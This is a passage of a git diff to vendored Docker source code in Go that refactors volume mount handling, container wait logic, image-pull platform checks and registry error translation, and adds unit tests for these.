os.Chown(mount.Source, rootIDs.UID, rootIDs.GID); err != nil { + return nil, err + } } } return append(mounts, netMounts...), nil @@ -93,84 +102,12 @@ func sortMounts(m []container.Mount) []container.Mount { // setBindModeIfNull is platform specific processing to ensure the // shared mode is set to 'z' if it is null. This is called in the case // of processing a named volume and not a typical bind. -func setBindModeIfNull(bind *volume.MountPoint) { +func setBindModeIfNull(bind *volumemounts.MountPoint) { if bind.Mode == "" { bind.Mode = "z" } } -// migrateVolume links the contents of a volume created pre Docker 1.7 -// into the location expected by the local driver. -// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data. -// It preserves the volume json configuration generated pre Docker 1.7 to be able to -// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility. -func migrateVolume(id, vfs string) error { - l, err := volumedrivers.GetDriver(volume.DefaultDriverName) - if err != nil { - return err - } - - newDataPath := l.(*local.Root).DataPath(id) - fi, err := os.Stat(newDataPath) - if err != nil && !os.IsNotExist(err) { - return err - } - - if fi != nil && fi.IsDir() { - return nil - } - - return os.Symlink(vfs, newDataPath) -} - -// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7. -// It reads the container configuration and creates valid mount points for the old volumes. -func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { - // Inspect old structures only when we're upgrading from old versions - // to versions >= 1.7 and the MountPoints has not been populated with volumes data. - type volumes struct { - Volumes map[string]string - VolumesRW map[string]bool - } - cfgPath, err := container.ConfigPath() - if err != nil { - return err - } - f, err := os.Open(cfgPath) - if err != nil { - return errors.Wrap(err, "could not open container config") - } - defer f.Close() - var cv volumes - if err := json.NewDecoder(f).Decode(&cv); err != nil { - return errors.Wrap(err, "could not decode container config") - } - - if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 { - for destination, hostPath := range cv.Volumes { - vfsPath := filepath.Join(daemon.root, "vfs", "dir") - rw := cv.VolumesRW != nil && cv.VolumesRW[destination] - - if strings.HasPrefix(hostPath, vfsPath) { - id := filepath.Base(hostPath) - v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil) - if err != nil { - return err - } - if err := migrateVolume(id, hostPath); err != nil { - return err - } - container.AddMountPointWithVolume(destination, v, true) - } else { // Bind mount - m := volume.MountPoint{Source: hostPath, Destination: destination, RW: rw} - container.MountPoints[destination] = &m - } - } - return container.ToDisk() - } - return nil -} - func (daemon *Daemon) mountVolumes(container *container.Container) error { mounts, err := daemon.setupMounts(container) if err != nil { diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix_test.go b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go new file mode 100644 index 0000000000..36e19110d1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go @@ -0,0 +1,256 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "fmt" + "reflect" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + volumemounts "github.com/docker/docker/volume/mounts" +) + +func TestBackportMountSpec(t *testing.T) { + d := Daemon{containers: container.NewMemoryStore()} + + c := &container.Container{ + State: &container.State{}, + MountPoints: map[string]*volumemounts.MountPoint{ + "/apple": {Destination: "/apple", Source: "/var/lib/docker/volumes/12345678", Name: "12345678", RW: true, CopyData: true}, // anonymous volume + "/banana": {Destination: "/banana", Source: "/var/lib/docker/volumes/data", Name: "data", RW: true, CopyData: true}, // named volume + "/cherry": {Destination: "/cherry", Source: "/var/lib/docker/volumes/data", Name: "data", CopyData: true}, // RO named volume + "/dates": {Destination: "/dates", Source: "/var/lib/docker/volumes/data", Name: "data"}, // named volume nocopy + "/elderberry": {Destination: "/elderberry", Source: "/var/lib/docker/volumes/data", Name: "data"}, // masks anon vol + "/fig": {Destination: "/fig", Source: "/data", RW: true}, // RW bind + "/guava": {Destination: "/guava", Source: "/data", RW: false, Propagation: "shared"}, // RO bind + propagation + "/kumquat": {Destination: "/kumquat", Name: "data", RW: false, CopyData: true}, // volumes-from + + // partially configured mountpoint due to #32613 + // specifically, `mp.Spec.Source` is not set + "/honeydew": { + Type: mounttypes.TypeVolume, + Destination: "/honeydew", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/honeydew", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + }, + + // from hostconfig.Mounts + "/jambolan": { + Type: mounttypes.TypeVolume, + Destination: "/jambolan", + Source: "/var/lib/docker/volumes/data", + RW: true, + Name: "data", + Spec: mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/jambolan", Source: "data"}, + }, + }, + HostConfig: &containertypes.HostConfig{ + Binds: []string{ + "data:/banana", + "data:/cherry:ro", + "data:/dates:ro,nocopy", + "data:/elderberry:ro,nocopy", + "/data:/fig", + "/data:/guava:ro,shared", + "data:/honeydew:nocopy", + }, + VolumesFrom: []string{"1:ro"}, + Mounts: []mounttypes.Mount{ + {Type: mounttypes.TypeVolume, Target: "/jambolan"}, + }, + }, + Config: &containertypes.Config{Volumes: map[string]struct{}{ + "/apple": {}, + "/elderberry": {}, + }}, + } + + d.containers.Add("1", &container.Container{ + State: &container.State{}, + ID: "1", + MountPoints: map[string]*volumemounts.MountPoint{ + "/kumquat": {Destination: "/kumquat", Name: "data", RW: false, CopyData: true}, + }, + HostConfig: &containertypes.HostConfig{ + Binds: []string{ + "data:/kumquat:ro", + }, + }, + }) + + type expected struct { + mp *volumemounts.MountPoint + comment string + } + + pretty := func(mp *volumemounts.MountPoint) string { + b, err := json.MarshalIndent(mp, "\t", " ") + if err != nil { + return fmt.Sprintf("%#v", mp) + } + return string(b) + } + + for _, x := range []expected{ + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/apple", + RW: true, + Name: "12345678", + Source: "/var/lib/docker/volumes/12345678", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "", + Target: "/apple", + }, + }, + comment: "anonymous volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/banana", + RW: true, + Name: "data", + Source: "/var/lib/docker/volumes/data", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/banana", + }, + }, + comment: "named volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/cherry", + Name: "data", + Source: "/var/lib/docker/volumes/data", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/cherry", + ReadOnly: true, + }, + }, + comment: "read-only named volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/dates", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/dates", + ReadOnly: true, + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "named volume with nocopy", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/elderberry", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/elderberry", + ReadOnly: true, + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "masks an anonymous volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeBind, + Destination: "/fig", + Source: "/data", + RW: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/data", + Target: "/fig", + }, + }, + comment: "bind mount with read/write", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeBind, + Destination: "/guava", + Source: "/data", + RW: false, + Propagation: "shared", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/data", + Target: "/guava", + ReadOnly: true, + BindOptions: &mounttypes.BindOptions{Propagation: "shared"}, + }, + }, + comment: "bind mount with read/write + shared propagation", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/honeydew", + Source: "/var/lib/docker/volumes/data", + RW: true, + Propagation: "shared", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/honeydew", + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "partially configured named volume caused by #32613", + }, + { + mp: &(*c.MountPoints["/jambolan"]), // copy the mountpoint, expect no changes + comment: "volume defined in mounts API", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/kumquat", + Source: "/var/lib/docker/volumes/data", + RW: false, + Name: "data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/kumquat", + ReadOnly: true, + }, + }, + comment: "partially configured named volume caused by #32613", + }, + } { + + mp := c.MountPoints[x.mp.Destination] + d.backportMountSpec(c) + + if !reflect.DeepEqual(mp.Spec, x.mp.Spec) { + t.Fatalf("%s\nexpected:\n\t%s\n\ngot:\n\t%s", x.comment, pretty(x.mp), pretty(mp)) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go index bf7fc478a1..a2fb5152d1 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_windows.go +++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go @@ -1,18 +1,18 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "sort" + "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" - "github.com/docker/docker/volume" + "github.com/docker/docker/pkg/idtools" + volumemounts "github.com/docker/docker/volume/mounts" ) // setupMounts configures the mount points for a container by appending each // of the configured mounts on the container to the OCI mount structure // which will ultimately be passed into the oci runtime during container creation. -// It also ensures each of the mounts are lexographically sorted. +// It also ensures each of the mounts are lexicographically sorted. // BUGBUG TODO Windows containerd. This would be much better if it returned // an array of runtime spec mounts, not container mounts. Then no need to @@ -20,11 +20,11 @@ import ( func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { var mnts []container.Mount - for _, mount := range c.MountPoints { // type is volume.MountPoint + for _, mount := range c.MountPoints { // type is volumemounts.MountPoint if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil { return nil, err } - s, err := mount.Setup(c.MountLabel, 0, 0) + s, err := mount.Setup(c.MountLabel, idtools.IDPair{UID: 0, GID: 0}, nil) if err != nil { return nil, err } @@ -42,6 +42,10 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er // setBindModeIfNull is platform specific processing which is a no-op on // Windows. -func setBindModeIfNull(bind *volume.MountPoint) { +func setBindModeIfNull(bind *volumemounts.MountPoint) { return } + +func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) { + return false, nil +} diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go index 2dab22e991..545f24c7b2 100644 --- a/vendor/github.com/docker/docker/daemon/wait.go +++ b/vendor/github.com/docker/docker/daemon/wait.go @@ -1,32 +1,23 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "time" + "context" - "golang.org/x/net/context" + "github.com/docker/docker/container" ) -// ContainerWait stops processing until the given container is -// stopped. If the container is not found, an error is returned. On a -// successful stop, the exit code of the container is returned. On a -// timeout, an error is returned. If you want to wait forever, supply -// a negative duration for the timeout. -func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) { - container, err := daemon.GetContainer(name) +// ContainerWait waits until the given container is in a certain state +// indicated by the given condition. If the container is not found, a nil +// channel and non-nil error is returned immediately. If the container is +// found, a status result will be sent on the returned channel once the wait +// condition is met or if an error occurs waiting for the container (such as a +// context timeout or cancellation). On a successful wait, the exit code of the +// container is returned in the status with a non-nil Err() value. +func (daemon *Daemon) ContainerWait(ctx context.Context, name string, condition container.WaitCondition) (<-chan container.StateStatus, error) { + cntr, err := daemon.GetContainer(name) if err != nil { - return -1, err + return nil, err } - return container.WaitStop(timeout) -} - -// ContainerWaitWithContext returns a channel where exit code is sent -// when container stops. Channel can be cancelled with a context. -func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error { - container, err := daemon.GetContainer(name) - if err != nil { - return err - } - - return container.WaitWithContext(ctx) + return cntr.Wait(ctx, condition), nil } diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go index 5bd0d0caca..90bba79b57 100644 --- a/vendor/github.com/docker/docker/daemon/workdir.go +++ b/vendor/github.com/docker/docker/daemon/workdir.go @@ -1,6 +1,6 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -// ContainerCreateWorkdir creates the working directory. This is solves the +// ContainerCreateWorkdir creates the working directory. This solves the // issue arising from https://github.com/docker/docker/issues/27545, // which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix // was too expensive in terms of performance on Windows. Instead, @@ -16,6 +16,5 @@ func (daemon *Daemon) ContainerCreateWorkdir(cID string) error { return err } defer daemon.Unmount(container) - rootUID, rootGID := daemon.GetRemappedUIDGID() - return container.SetupWorkingDirectory(rootUID, rootGID) + return container.SetupWorkingDirectory(daemon.idMappings.RootPair()) } diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go index bfea8b0336..55f1f8c2df 100644 --- a/vendor/github.com/docker/docker/distribution/config.go +++ b/vendor/github.com/docker/docker/distribution/config.go @@ -1,13 +1,13 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "encoding/json" "fmt" "io" "runtime" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" @@ -15,10 +15,12 @@ import ( "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" "github.com/docker/libtrust" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" ) // Config stores configuration for communicating @@ -44,7 +46,7 @@ type Config struct { ImageStore ImageConfigStore // ReferenceStore manages tags. This value is optional, when excluded // content will not be tagged. - ReferenceStore reference.Store + ReferenceStore refstore.Store // RequireSchema2 ensures that only schema2 manifests are used. RequireSchema2 bool } @@ -58,6 +60,9 @@ type ImagePullConfig struct { // Schema2Types is the valid schema2 configuration types allowed // by the pull operation. Schema2Types []string + // OS is the requested operating system of the image being pulled to ensure it can be validated + // when the host OS supports multiple image operating systems. + OS string } // ImagePushConfig stores push configuration. @@ -67,8 +72,8 @@ type ImagePushConfig struct { // ConfigMediaType is the configuration media type for // schema2 manifests. ConfigMediaType string - // LayerStore manages layers. - LayerStore PushLayerProvider + // LayerStores (indexed by operating system) manages layers. + LayerStores map[string]PushLayerProvider // TrustKey is the private key for legacy signatures. This is typically // an ephemeral key, since these signatures are no longer verified. TrustKey libtrust.PrivateKey @@ -83,6 +88,7 @@ type ImageConfigStore interface { Put([]byte) (digest.Digest, error) Get(digest.Digest) ([]byte, error) RootFSFromConfig([]byte) (*image.RootFS, error) + PlatformFromConfig([]byte) (*specs.Platform, error) } // PushLayerProvider provides layers to be pushed by ChainID. @@ -108,7 +114,7 @@ type RootFSDownloadManager interface { // returns the final rootfs. // Given progress output to track download progress // Returns function to release download resources - Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) + Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) } type imageConfigStore struct { @@ -141,26 +147,46 @@ func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { return nil, err } + return unmarshalledConfig.RootFS, nil +} - // fail immediately on windows - if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" { +func (s *imageConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) { + var unmarshalledConfig image.Image + if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { + return nil, err + } + + // fail immediately on Windows when downloading a non-Windows image + // and vice versa. Exception on Windows if Linux Containers are enabled. + if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" && !system.LCOWSupported() { + return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) + } else if runtime.GOOS != "windows" && unmarshalledConfig.OS == "windows" { return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) } - return unmarshalledConfig.RootFS, nil + os := unmarshalledConfig.OS + if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return nil, system.ErrNotSupportedOperatingSystem + } + return &specs.Platform{OS: os, OSVersion: unmarshalledConfig.OSVersion}, nil } type storeLayerProvider struct { ls layer.Store } -// NewLayerProviderFromStore returns a layer provider backed by +// NewLayerProvidersFromStores returns layer providers backed by // an instance of LayerStore. Only getting layers as gzipped // tars is supported. -func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider { - return &storeLayerProvider{ - ls: ls, +func NewLayerProvidersFromStores(lss map[string]layer.Store) map[string]PushLayerProvider { + plps := make(map[string]PushLayerProvider) + for os, ls := range lss { + plps[os] = &storeLayerProvider{ls: ls} } + return plps } func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) { diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go index b8cf9fb9e8..e2913d45d6 100644 --- a/vendor/github.com/docker/docker/distribution/errors.go +++ b/vendor/github.com/docker/docker/distribution/errors.go @@ -1,19 +1,20 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "fmt" "net/url" "strings" "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/api/v2" "github.com/docker/distribution/registry/client" "github.com/docker/distribution/registry/client/auth" "github.com/docker/docker/distribution/xfer" - "github.com/docker/docker/reference" - "github.com/pkg/errors" + "github.com/docker/docker/errdefs" + "github.com/sirupsen/logrus" ) // ErrNoSupport is an error type used for errors indicating that an operation @@ -60,6 +61,31 @@ func shouldV2Fallback(err errcode.Error) bool { return false } +type notFoundError struct { + cause errcode.Error + ref reference.Named +} + +func (e notFoundError) Error() string { + switch e.cause.Code { + case errcode.ErrorCodeDenied: + // ErrorCodeDenied is used when access to the repository was denied + return fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", reference.FamiliarName(e.ref)) + case v2.ErrorCodeManifestUnknown: + return fmt.Sprintf("manifest for %s not found", reference.FamiliarString(e.ref)) + case v2.ErrorCodeNameUnknown: + return fmt.Sprintf("repository %s not found", reference.FamiliarName(e.ref)) + } + // Shouldn't get here, but this is better than returning an empty string + return e.cause.Message +} + +func (e notFoundError) NotFound() {} + +func (e notFoundError) Cause() error { + return e.cause +} + // TranslatePullError is used to convert an error from a registry pull // operation to an error representing the entire pull operation. Any error // information which is not used by the returned error gets output to @@ -74,46 +100,40 @@ func TranslatePullError(err error, ref reference.Named) error { return TranslatePullError(v[0], ref) } case errcode.Error: - var newErr error switch v.Code { - case errcode.ErrorCodeDenied: - // ErrorCodeDenied is used when access to the repository was denied - newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name()) - case v2.ErrorCodeManifestUnknown: - newErr = errors.Errorf("manifest for %s not found", ref.String()) - case v2.ErrorCodeNameUnknown: - newErr = errors.Errorf("repository %s not found", ref.Name()) - } - if newErr != nil { - logrus.Infof("Translating %q to %q", err, newErr) - return newErr + case errcode.ErrorCodeDenied, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown: + return notFoundError{v, ref} } case xfer.DoNotRetry: return TranslatePullError(v.Err, ref) } - return err + return errdefs.Unknown(err) } // continueOnError returns true if we should fallback to the next endpoint // as a result of this error. -func continueOnError(err error) bool { +func continueOnError(err error, mirrorEndpoint bool) bool { switch v := err.(type) { case errcode.Errors: if len(v) == 0 { return true } - return continueOnError(v[0]) + return continueOnError(v[0], mirrorEndpoint) case ErrNoSupport: - return continueOnError(v.Err) + return continueOnError(v.Err, mirrorEndpoint) case errcode.Error: - return shouldV2Fallback(v) + return mirrorEndpoint || shouldV2Fallback(v) case *client.UnexpectedHTTPResponseError: return true case ImageConfigPullError: - return false + // ImageConfigPullError only happens with v2 images, v1 fallback is + // unnecessary. + // Failures from a mirror endpoint should result in fallback to the + // canonical repo. + return mirrorEndpoint case error: - return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) + return !strings.Contains(err.Error(), strings.ToLower(syscall.ESRCH.Error())) } // let's be nice and fallback if the error is a completely // unexpected one. @@ -157,3 +177,30 @@ func retryOnError(err error) error { // add them to the switch above. return err } + +type invalidManifestClassError struct { + mediaType string + class string +} + +func (e invalidManifestClassError) Error() string { + return fmt.Sprintf("Encountered remote %q(%s) when fetching", e.mediaType, e.class) +} + +func (e invalidManifestClassError) InvalidParameter() {} + +type invalidManifestFormatError struct{} + +func (invalidManifestFormatError) Error() string { + return "unsupported manifest format" +} + +func (invalidManifestFormatError) InvalidParameter() {} + +type reservedNameError string + +func (e reservedNameError) Error() string { + return "'" + string(e) + "' is a reserved name" +} + +func (e reservedNameError) Forbidden() {} diff --git a/vendor/github.com/docker/docker/distribution/errors_test.go b/vendor/github.com/docker/docker/distribution/errors_test.go new file mode 100644 index 0000000000..7105bdb4d6 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/errors_test.go @@ -0,0 +1,85 @@ +package distribution // import "github.com/docker/docker/distribution" + +import ( + "errors" + "strings" + "syscall" + "testing" + + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/distribution/registry/api/v2" + "github.com/docker/distribution/registry/client" +) + +var alwaysContinue = []error{ + &client.UnexpectedHTTPResponseError{}, + + // Some errcode.Errors that don't disprove the existence of a V1 image + errcode.Error{Code: errcode.ErrorCodeUnauthorized}, + errcode.Error{Code: v2.ErrorCodeManifestUnknown}, + errcode.Error{Code: v2.ErrorCodeNameUnknown}, + + errors.New("some totally unexpected error"), +} + +var continueFromMirrorEndpoint = []error{ + ImageConfigPullError{}, + + // Some other errcode.Error that doesn't indicate we should search for a V1 image. + errcode.Error{Code: errcode.ErrorCodeTooManyRequests}, +} + +var neverContinue = []error{ + errors.New(strings.ToLower(syscall.ESRCH.Error())), // No such process +} + +func TestContinueOnError_NonMirrorEndpoint(t *testing.T) { + for _, err := range alwaysContinue { + if !continueOnError(err, false) { + t.Errorf("Should continue from non-mirror endpoint: %T: '%s'", err, err.Error()) + } + } + + for _, err := range continueFromMirrorEndpoint { + if continueOnError(err, false) { + t.Errorf("Should only continue from mirror endpoint: %T: '%s'", err, err.Error()) + } + } +} + +func TestContinueOnError_MirrorEndpoint(t *testing.T) { + var errs []error + errs = append(errs, alwaysContinue...) + errs = append(errs, continueFromMirrorEndpoint...) + for _, err := range errs { + if !continueOnError(err, true) { + t.Errorf("Should continue from mirror endpoint: %T: '%s'", err, err.Error()) + } + } +} + +func TestContinueOnError_NeverContinue(t *testing.T) { + for _, isMirrorEndpoint := range []bool{true, false} { + for _, err := range neverContinue { + if continueOnError(err, isMirrorEndpoint) { + t.Errorf("Should never continue: %T: '%s'", err, err.Error()) + } + } + } +} + +func TestContinueOnError_UnnestsErrors(t *testing.T) { + // ContinueOnError should evaluate nested errcode.Errors. + + // Assumes that v2.ErrorCodeNameUnknown is a continueable error code. + err := errcode.Errors{errcode.Error{Code: v2.ErrorCodeNameUnknown}} + if !continueOnError(err, false) { + t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors") + } + + // Assumes that errcode.ErrorCodeTooManyRequests is not a V1-fallback indication + err = errcode.Errors{errcode.Error{Code: errcode.ErrorCodeTooManyRequests}} + if continueOnError(err, false) { + t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors") + } +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go index 05ba4f817d..4ae8223bd0 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/metadata.go +++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go index f262d4dc34..5575c59b0e 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "github.com/docker/docker/image/v1" diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go index 556886581e..5003897cbb 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "io/ioutil" @@ -6,6 +6,7 @@ import ( "testing" "github.com/docker/docker/layer" + "gotest.tools/assert" ) func TestV1IDService(t *testing.T) { @@ -21,6 +22,10 @@ func TestV1IDService(t *testing.T) { } v1IDService := NewV1IDService(metadataStore) + ns := v1IDService.namespace() + + assert.Equal(t, "v1id", ns) + testVectors := []struct { registry string v1ID string diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go index 02d1b4ad21..fe33498554 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "crypto/hmac" @@ -7,9 +7,9 @@ import ( "encoding/json" "errors" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) // V2MetadataService maps layer IDs to a set of known metadata for @@ -38,7 +38,7 @@ type V2Metadata struct { HMAC string } -// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key". +// CheckV2MetadataHMAC returns true if the given "meta" is tagged with a hmac hashed by the given "key". func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool { if len(meta.HMAC) == 0 || len(key) == 0 { return len(meta.HMAC) == 0 && len(key) == 0 @@ -84,7 +84,7 @@ func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) { if err != nil { return nil, err } - return []byte(digest.FromBytes([]byte(buf))), nil + return []byte(digest.FromBytes(buf)), nil } // authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for @@ -203,7 +203,7 @@ func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, me return serv.Add(diffID, meta) } -// Remove unassociates a metadata entry from a layer DiffID. +// Remove disassociates a metadata entry from a layer DiffID. func (serv *v2MetadataService) Remove(metadata V2Metadata) error { if serv.store == nil { // Support a service which has no backend storage, in this case diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go index 7b0ecb1572..cf24e0d85b 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "encoding/hex" @@ -8,8 +8,8 @@ import ( "reflect" "testing" - "github.com/docker/distribution/digest" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) func TestV2MetadataService(t *testing.T) { diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go index a0acfe5b6b..0240eb05f7 100644 --- a/vendor/github.com/docker/docker/distribution/pull.go +++ b/vendor/github.com/docker/docker/distribution/pull.go @@ -1,16 +1,19 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "fmt" + "runtime" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Puller is an interface that abstracts pulling for different API versions. @@ -18,7 +21,7 @@ type Puller interface { // Pull tries to pull the image referenced by `tag` // Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint. // - Pull(ctx context.Context, ref reference.Named) error + Pull(ctx context.Context, ref reference.Named, os string) error } // newPuller returns a Puller interface that will pull from either a v1 or v2 @@ -55,12 +58,12 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo return err } - // makes sure name is not empty or `scratch` - if err := ValidateRepoName(repoInfo.Name()); err != nil { + // makes sure name is not `scratch` + if err := ValidateRepoName(repoInfo.Name); err != nil { return err } - endpoints, err := 